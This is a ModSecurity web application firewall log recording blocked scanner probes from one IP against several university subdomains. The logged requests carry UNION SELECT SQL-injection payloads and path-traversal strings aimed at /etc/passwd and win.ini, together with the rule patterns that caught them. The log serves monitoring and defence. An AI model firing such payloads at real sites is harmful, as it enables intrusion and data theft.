[Tue Aug 29 11:47:15.420703 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjqDEoAAAAH"]
[Tue Aug 29 11:47:15.423534 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14U8Co-f0AAAjtc08AAAAX"]
[Tue Aug 29 11:47:15.436472 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjM7DsAAAAT"]
[Tue Aug 29 11:47:15.480917 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjrbHEAAAAP"]
[Tue Aug 29 11:47:15.501059 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14U8Co-f0AAAdxU0EAAAAC"]
[Tue Aug 29 11:47:15.872908 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjdQM8AAAAZ"]
[Tue Aug 29 11:47:15.935506 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjy51YAAAAG"]
[Tue Aug 29 11:47:16.355006 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14VMCo-f0AAAhl0HkAAAAi"]
[Tue Aug 29 11:47:16.359532 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14VMCo-f0AAAjCbE8AAAAB"]
[Tue Aug 29 11:47:16.398227 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAcsLekAAAAE"]
[Tue Aug 29 11:47:16.407748 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAjYrB4AAAAK"]
[Tue Aug 29 11:47:16.409621 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAjKywsAAAAQ"]
[Tue Aug 29 11:47:16.413174 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAjy51kAAAAG"]
[Tue Aug 29 11:47:16.427346 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAhl0HwAAAAi"]
[Tue Aug 29 11:47:17.938473 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VcCo-f0AAAjYrCIAAAAK"]
[Tue Aug 29 11:47:18.432636 2023] [:error] [pid 2302] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAj@-tsAAAAI"]
[Tue Aug 29 11:47:18.453488 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAj1138AAAAa"]
[Tue Aug 29 11:47:18.479179 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAhui78AAAAr"]
[Tue Aug 29 11:47:18.498629 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAh132wAAAAz"]
[Tue Aug 29 11:47:18.519088 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAh1320AAAAz"]
[Tue Aug 29 11:47:19.408363 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAhui8QAAAAr"]
[Tue Aug 29 11:47:19.410145 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAjCbFIAAAAB"]
[Tue Aug 29 11:47:19.429503 2023] [:error] [pid 2302] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAj@-uQAAAAI"]
[Tue Aug 29 11:47:19.485669 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAjCbFQAAAAB"]
[Tue Aug 29 11:47:19.489708 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjdQNMAAAAZ"]
[Tue Aug 29 11:47:19.517050 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAjCbFUAAAAB"]
[Tue Aug 29 11:47:19.519022 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjdQNQAAAAZ"]
[Tue Aug 29 11:47:19.579511 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAi@TDYAAAAM"]
[Tue Aug 29 11:47:19.591393 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjM7D4AAAAT"]
[Tue Aug 29 11:47:19.595031 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjCbFkAAAAB"]
[Tue Aug 29 11:47:19.611974 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjM7D8AAAAT"]
[Tue Aug 29 11:47:20.429269 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14WMCo-f0AAAjIhooAAAAJ"]
